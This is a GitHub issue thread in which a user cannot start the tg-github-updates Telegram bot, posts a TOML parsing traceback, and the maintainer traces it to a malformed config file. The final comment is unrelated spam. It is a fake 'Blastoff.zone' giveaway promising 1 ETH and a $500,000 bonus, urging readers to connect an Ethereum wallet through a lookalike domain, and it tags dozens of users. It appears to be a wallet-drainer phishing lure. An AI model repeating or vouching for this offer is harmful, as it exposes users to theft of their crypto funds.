### ISSUE TITLE
Error on start

### ISSUE THREAD

**Issue by otaldonunes** [RememberTheAir/tg-github-updates#3]
Hey hello!

Nice project, but i cant find how to start it, u can help me please?
i tried to run with python3 in command line but get errors everytime, u can give me the steps after install requeriments and configurate to start the bot?

**Comment by RememberTheAir** [comment]
The basics to get the script running are in the readme of this repository. To help you I need you to provide a description of the error and what you did to setup the script

**Comment by otaldonunes** [comment]
Hello, thanks for help! 

I clone the repo, install deps, set configs according readme and tried to run the python files with python file (but can't find what file i need to run, every .py file in folder show error)

**Comment by RememberTheAir** [comment]
You should run `main.py`, but I can't help you unless you provide the error traceback that running that file raises

**Comment by otaldonunes** [comment]
> You should run `main.py`, but I can't help you unless you provide the error traceback that running that file raises

Traceback (most recent call last):
  File "/home/otaldonunes/.local/lib/python3.8/site-packages/toml/decoder.py", line 511, in loads
    ret = decoder.load_line(line, currentlevel, multikey,
  File "/home/otaldonunes/.local/lib/python3.8/site-packages/toml/decoder.py", line 778, in load_line
    value, vtype = self.load_value(pair[1], strictly_valid)
  File "/home/otaldonunes/.local/lib/python3.8/site-packages/toml/decoder.py", line 910, in load_value
    raise ValueError("This float doesn't have a leading "
ValueError: This float doesn't have a leading digit

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "main.py", line 10, in <module>
    from config import config
  File "/home/otaldonunes/Documentos/BotTelegramGitHub/tg-github-updates/config.py", line 12, in <module>
    repos = toml.load('repos.toml', AttrDict)
  File "/home/otaldonunes/.local/lib/python3.8/site-packages/toml/decoder.py", line 134, in load
    return loads(ffile.read(), _dict, decoder)
  File "/home/otaldonunes/.local/lib/python3.8/site-packages/toml/decoder.py", line 514, in loads
    raise TomlDecodeError(str(err), original, pos)
toml.decoder.TomlDecodeError: This float doesn't have a leading digit (line 16 column 1 char 1081)

**Comment by RememberTheAir** [comment]
There's something wrong in your `config.toml` file, probably a missing closing " or another formatting error

**Comment by jorge-nascimento** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
4rock, @MohamedLEGH, @placecodex, @cprkrn, @esengulov, @marcelgsantos, @siamakahmadi, @GuoGuangya, @OmarWagih1, @morenoh149, @dudebing99, @npodonnell, @GregTonoski, @rafacv, @Lunaticf, @DonAurelio, @andersy005, @RooSoft, @cartosquare, @youakim, @rxzwxn, @andrewwell7, @federico-m-lopez, @cryptonik, @Zero-1729, @tou55aint, @nealsun, @ThaiDangFr, @ovekyc, @craiglmccarthy, @corysolovewicz, @cesarmiquel, @Annasadra, @feichihu, @YuriRocha, @AnthonyRossi1, @bitcoinrunners, @bitcoinfacts, @Hugo-Huang, @HiggRn, @kaichen, @csstt, @Tedev555, @algtm, @liuenyan, @BrandonSM, @rkipper, @ConYel, @amitasaurus, @nathan-vm
